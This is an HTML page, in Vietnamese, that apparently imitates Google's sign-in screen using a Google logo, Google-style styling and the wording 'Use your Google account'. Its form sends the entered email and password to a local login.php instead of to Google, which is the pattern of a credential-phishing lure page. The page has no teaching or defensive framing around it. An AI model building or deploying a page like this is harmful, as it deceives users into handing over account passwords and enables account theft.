<!DOCTYPE html>
<html>
<title>Đăng nhập Google</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
<link rel="icon" type="image/x-icon" href="ggIcon.ico">
<!-- !PAGE CONTENT! -->
<div class="w3-content" style="max-width:1500px">
<head>
<style>
@import url(https://fonts.googleapis.com/css?family=Roboto:400,100);

body {
  background: url(https://dl.dropboxusercontent.com/u/23299152/Wallpapers/wallpaper-22705.jpg) no-repeat center center fixed; 
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
  font-family: 'Roboto', sans-serif;
}

.login-card {
  top: 100px;
  padding: 40px;
  padding-bottom: 200px;
  width: 30vw;
  background-color: whitesmoke;
  margin: 50px auto 10px;  
  border-radius: 2px;
  box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  overflow: hidden;
  height: 600px;
}

.login-card h1 {
  font-weight: 100;
  text-align: center;
  font-size: 2.3em;
}

.login-card input[type=submit] {
  width: 100%;
  display: block;
  margin-bottom: 10px;
  position: relative;
}

.login-card input[type=text], input[type=password] {
  height: 44px;
  font-size: 16px;
  border-radius: 5px;
  width: 100%;
  margin-bottom: 10px;
  -webkit-appearance: none;
  background: #fff;
  border: 1px solid #d9d9d9;
  border-top: 1px solid #c0c0c0;
  /* border-radius: 2px; */
  padding: 0 20px;
  box-sizing: border-box;
  -moz-box-sizing: border-box;
}

.login-card input[type=text]:hover, input[type=password]:hover {
  border: 1px solid #b9b9b9;
  border-top: 1px solid #a0a0a0;
  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
}

.login {
  text-align: center;
  font-size: 14px;
  font-family: 'Arial', sans-serif;
  font-weight: 700;
  height: 36px;
  padding: 0 8px;
/* border-radius: 3px; */
/* -webkit-user-select: none;
  user-select: none; */
}

.login-submit {
  /* border: 1px solid #3079ed; */
  border: 0px;
  color: #fff;
  text-shadow: 0 1px rgba(0,0,0,0.1); 
  background-color: #4d90fe;
  /* background-image: -webkit-gradient(linear, 0 0, 0 100%,   from(#4d90fe), to(#4787ed)); */
}

.login-submit:hover {
  /* border: 1px solid #2f5bb7; */
  border: 0px;
  text-shadow: 0 1px rgba(0,0,0,0.3);
  background-color: #357ae8;
  /* background-image: -webkit-gradient(linear, 0 0, 0 100%,   from(#4d90fe), to(#357ae8)); */
}

.login-card a {
  text-decoration: none;
  color: #666;
  font-weight: 400;
  text-align: center;
  display: inline-block;
  opacity: 0.6;
  transition: opacity ease 0.5s;
}

.login-card a:hover {
  opacity: 1;
}

.login-help {
  width: 100%;
  text-align: center;
  font-size: 12px;
  position: flex;
  margin-bottom: 120px;
}

#ggLogo  {
  display: block;
  margin: auto;
}

@media only screen and (max-width: 700px)  {
  .login-card  {
    width: 90vw;
  }
}

</style>
</head>
<header class="w3-panel w3-center w3-opacity">
</header>
<body>
<div class="login-card">
    <img src="googleLogo.png" width="100px" id="ggLogo">
    <h5 style="text-align: center; font-weight: 500; font-size: 23px">Đăng nhập</h5>
    <p style="text-align: center">Sử dụng tài khoản Google của bạn</p>
  <form action="login.php" method="post">
    <input type="text" name="email" placeholder="Email" required>
    <input type="password" name="pass" placeholder="Mật khẩu" required>
    <input type="submit" name="login" class="login login-submit" value="Đăng nhập">
    <a href="" style="color: #002a9e;"><p>Bạn quên địa chỉ email?</p></a>
  </form>
    
  <div class="login-help">
    Đây không phải máy tính của bạn? Hãy sử dụng chế độ Khách để đăng nhập một cách riêng tư.
  </div>
  <span class="lang">Tiếng Việt</span>
</div>
</body>
</html>
